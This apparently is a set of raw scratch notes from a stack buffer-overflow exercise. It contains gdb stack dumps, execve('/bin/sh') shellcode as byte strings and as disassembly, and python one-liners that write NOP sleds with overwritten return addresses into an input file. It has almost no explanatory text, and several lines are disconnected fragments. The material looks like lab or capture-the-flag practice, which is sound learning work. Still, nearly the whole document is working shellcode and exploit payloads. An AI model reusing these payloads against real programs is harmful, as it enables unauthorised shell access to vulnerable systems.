
0x7fffffffdc58: 0x00400543	0x00000000	0x41414141	0x41414141
0x7fffffffdc68: 0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffdc78: 0x41414141	0x41414141	0x41414141	0x41414141
---Type <return> to continue, or q <return> to quit---
0x7fffffffdc88: 0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffdc98: 0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffdca8: 0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffdcb8: 0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffdcc8: 0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffdcd8: 0x41414141	0x41414141	0x41414141	0x41414141
(gdb) x/10x 0x7fffffffdcd8
0x7fffffffdcd8: 0x41414141	0x41414141	0x41414141	0x41414141
0x7fffffffdce8: 0x00400527	0x00000000	0x00000000	0x00000000
0x7fffffffdcf8: 0xffffddc8	0x00007fff


\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x38\x0f\x05



\x48
\x31
\xd2
\x48
\xbb
\x2f
\x2f
\x62
\x69
\x6e
\x2f
\x73
\x68
\x48
\xc1
\xeb
\x08
\x53
\x48
\x89
\xe7
\x50
\x57
\x48
\x89
\xe6
\xb0
\x3b
\x0f
\x05
"+"\x90"*106 + "\x50\xe0\xff\xff\xff\x7f\x00\x00"' > input


python -c 'print "\x90"*130 +"\x53\x9e\xb9\xf7\xff\x7f" + "\x50\xBD\xA4\xf7\xff\x7f"' > input

\x55\x48\x89\xe5\x48\x83\xec\x10\x48\xb8\x70\x80\xa4\xf7\xff\x7f\x00\x00\x48\x89\x45\xf8\x48\x8b\x45\xf8\x48\xbf\x73\x96\xb9\xf7\xff\x7f\x00\x00\xff\xd0
\x48\x8b\x3c\x24\x48\x31\xf6\xb0\x38\x0f\x05
\x55\x48\x89\xe5\x48\x83\xec\x10\x48\xb8\x70
\x80\xa4\xf7\xff\x7f\x00\x00\x48\x89\x45\xf8
\x48\x8b\x45\xf8\x48\xbf\x73\x96\xb9\xf7\xff
\x7f\x00\x00\xff\xd0

python -c 'print "\x90"*102 + "\x55\x48\x89\xe5\x48\x83\xec\x10\x48\xb8\x70\x80\xa4\xf7\xff\x7f\x00\x00\x48\x89\x45\xf8\x48\x8b\x45\xf8\x48\xbf\x73\x96\xb9\xf7\xff\x7f\x00\x00\xff\xd0" +"\xb8\xdc\xff\xff\xff\x7f\x00\x00"' > input
                              "\xba\x00\x00\x00\x00\xbe\x00\x00\x00\x00\x48\xbf\x73\x96\xb9\xf7\xff\x7f\x00\x00\xb8\x3b"

0000000000400487 <main>:
  400487:	55                   	push   %rbp
  400488:	48 89 e5             	mov    %rsp,%rbp
  40048b:	48 83 ec 10          	sub    $0x10,%rsp
  40048f:	48 b8 70 80 a4 f7 ff 	movabs $0x7ffff7a48070,%rax
  400496:	7f 00 00 
  400499:	48 89 45 f8          	mov    %rax,-0x8(%rbp)
  40049d:	48 8b 45 f8          	mov    -0x8(%rbp),%rax
  4004a1:	48 bf 73 96 b9 f7 ff 	movabs $0x7ffff7b99673,%rdi
  4004a8:	7f 00 00 
  4004ab:	ff d0                	callq  *%rax
  4004ad:	b8 00 00 00 00       	mov    $0x0,%eax
  4004b2:	c9                   	leaveq 
  4004b3:	c3                   	retq   
  4004b4:	66 2e 0f 1f 84 00 00 	nopw   %cs:0x0(%rax,%rax,1)
  4004bb:	00 00 00 
  4004be:	66 90                	xchg   %ax,%ax


 400490:	ba 00 00 00 00       	mov    $0x0,%edx
  400495:	be 00 00 00 00       	mov    $0x0,%esi
  40049a:	48 bf 73 96 b9 f7 ff 	movabs $0x7ffff7b99673,%rdi
  4004a1:	7f 00 00 
  4004a4:	b8 3b 00 00 00       	mov    $0x3b,%eax
  4004a9:	0f 05                	syscall


mike s input: python -c 'print "\x90"*116 + "\xba\x00\x00\x00\x00\xbe\x00\x00\x00\x00\x48\xbf\x73\x96\xb9\xf7\xff\x7f\x00\x00\xb8\x3b\x00\x00\x00\x0f\x05" +"\xb8\xdc\xff\xff\xff\x7f\x00\x00"' > input

mike w input: python -c "print '\x90'*(104) + '\xb8\x3b\x00\x00\x00\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x56\x57\x54\x5f\x0f\x05\x66\x90' + '\x58\xdc\xff\xff\xff\x7f\x00\x00'" > input




	b8 3b 00 00 00       	mov    $0x3b,%eax
    48 31 c9             	xor    %rcx,%rcx
    48 31 d2             	xor    %rdx,%rdx
    48 31 f6             	xor    %rsi,%rsi
    48 bf 73 96 b9 f7 ff 	movabs $0x7ffff7b99673,%rdi
    7f 00 00 
    0f 05
    
    
\xb8\x3b\x00\x00\x00\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\xbf\x73\x96\xb9\xf7\xff\x7f\x00\x00\x0f\x05

'\xb8\x3b\x00\x00\x00\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x56\x57\x54\x5f\x0f\x05\x66\x90'
